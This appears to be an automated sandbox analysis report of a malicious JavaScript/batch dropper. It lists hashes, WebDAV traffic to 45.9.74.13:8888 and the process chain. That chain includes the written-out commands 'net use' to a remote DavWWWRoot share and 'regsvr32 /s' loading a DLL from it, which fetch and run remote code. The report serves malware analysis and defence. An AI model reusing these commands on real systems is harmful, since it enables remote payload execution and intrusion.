    SHA1:511998d50a6780c570dd0c920ba1dfeae2d27a43
    SHA256:7d84dcf2dd227761c0eb67814538c2d2eb6de133e7ad1977e6756f76742c9084
    SHA512:489d53109e1ad5ac237fe3652488bdba9971c0ef66d7cd25a99e2bf777cbcc74d9b29ac6928ecf6ffcf752b367a7d103157584562cf1714d8d9a97efea65306b
    SSDEEP:96:bbzgmh/bLVpmMtPlmZDBlEuRRlaMaIYNQlGVTdvaeg8D95okqwUOLacKVaD9vBax:bgmLsDGnAF9iXkmkz
    TLSH:BCC19791FE1731E8C53F0856B7730462CE6EE9192B13E74A98568F05E826464CF81EFC
    File Content Preview:/* apjasa..set apjasavjxahy=H..set apjasajniuyr=p..set apjasajcspao=c..set apjasaxxzgur=h..set apjasakshqyq=C..set apjasainkctl=M..set apjasaaeujqf=9..set apjasaujncqu=W..set apjasahtbcgp=w..set apjasacqvldm=0..set apjasafcsowl=o..set apjasaanpgeg=j..set
    Icon Hash:68d69b8bb6aa9a86
    TimestampSource PortDest PortSource IPDest IP
    Jul 5, 2024 06:32:05.430743933 CEST497308888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:05.435760975 CEST88884973045.9.74.13192.168.2.4
    Jul 5, 2024 06:32:05.435830116 CEST497308888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:05.436306000 CEST497308888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:05.441025019 CEST88884973045.9.74.13192.168.2.4
    Jul 5, 2024 06:32:06.143507957 CEST88884973045.9.74.13192.168.2.4
    Jul 5, 2024 06:32:06.187587023 CEST497308888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:09.348604918 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:09.353584051 CEST88884973145.9.74.13192.168.2.4
    Jul 5, 2024 06:32:09.353667021 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:09.353786945 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:09.358510017 CEST88884973145.9.74.13192.168.2.4
    Jul 5, 2024 06:32:10.076914072 CEST88884973145.9.74.13192.168.2.4
    Jul 5, 2024 06:32:10.125075102 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:10.198607922 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:10.203701019 CEST88884973145.9.74.13192.168.2.4
    Jul 5, 2024 06:32:10.419562101 CEST88884973145.9.74.13192.168.2.4
    Jul 5, 2024 06:32:10.468822956 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:10.676532030 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:10.681555033 CEST88884973145.9.74.13192.168.2.4
    Jul 5, 2024 06:32:10.897526026 CEST88884973145.9.74.13192.168.2.4
    Jul 5, 2024 06:32:10.953181982 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:11.038672924 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:11.043461084 CEST88884973145.9.74.13192.168.2.4
    Jul 5, 2024 06:32:11.261271954 CEST88884973145.9.74.13192.168.2.4
    Jul 5, 2024 06:32:11.311815977 CEST497308888192.168.2.445.9.74.13
    Jul 5, 2024 06:32:11.312604904 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:33:11.250381947 CEST497318888192.168.2.445.9.74.13
    Jul 5, 2024 06:33:11.255954027 CEST88884973145.9.74.13192.168.2.4
    Jul 5, 2024 06:33:11.256011009 CEST497318888192.168.2.445.9.74.13
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.44973045.9.74.1388887360C:\Windows\System32\net.exe
    TimestampBytes transferredDirectionData
    Jul 5, 2024 06:32:05.436306000 CEST104OUTOPTIONS / HTTP/1.1
    Connection: Keep-Alive
    User-Agent: DavClnt
    translate: f
    Host: 45.9.74.13:8888
    Jul 5, 2024 06:32:06.143507957 CEST82INHTTP/1.1 403 Forbidden
    Date: Fri, 05 Jul 2024 04:32:06 GMT
    Content-Length: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    1192.168.2.44973145.9.74.138888
    TimestampBytes transferredDirectionData
    Jul 5, 2024 06:32:09.353786945 CEST134OUTOPTIONS / HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
    translate: f
    Host: 45.9.74.13:8888
    Jul 5, 2024 06:32:10.076914072 CEST82INHTTP/1.1 403 Forbidden
    Date: Fri, 05 Jul 2024 04:32:09 GMT
    Content-Length: 0
    Jul 5, 2024 06:32:10.198607922 CEST134OUTOPTIONS / HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
    translate: f
    Host: 45.9.74.13:8888
    Jul 5, 2024 06:32:10.419562101 CEST82INHTTP/1.1 403 Forbidden
    Date: Fri, 05 Jul 2024 04:32:10 GMT
    Content-Length: 0
    Jul 5, 2024 06:32:10.676532030 CEST134OUTOPTIONS / HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
    translate: f
    Host: 45.9.74.13:8888
    Jul 5, 2024 06:32:10.897526026 CEST82INHTTP/1.1 403 Forbidden
    Date: Fri, 05 Jul 2024 04:32:10 GMT
    Content-Length: 0
    Jul 5, 2024 06:32:11.038672924 CEST134OUTOPTIONS / HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
    translate: f
    Host: 45.9.74.13:8888
    Jul 5, 2024 06:32:11.261271954 CEST82INHTTP/1.1 403 Forbidden
    Date: Fri, 05 Jul 2024 04:32:11 GMT
    Content-Length: 0


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:00:32:04
    Start date:05/07/2024
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js"
    Imagebase:0x7ff6e3170000
    File size:170'496 bytes
    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:1
    Start time:00:32:04
    Start date:05/07/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"
    Imagebase:0x7ff7f0120000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:2
    Start time:00:32:04
    Start date:05/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:3
    Start time:00:32:04
    Start date:05/07/2024
    Path:C:\Windows\System32\net.exe
    Wow64 process (32bit):false
    Commandline:net use \\45.9.74.13@8888\DavWWWRoot\
    Imagebase:0x7ff6969d0000
    File size:59'904 bytes
    MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:10
    Start time:00:32:10
    Start date:05/07/2024
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll
    Imagebase:0x7ff79b0e0000
    File size:25'088 bytes
    MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    No disassembly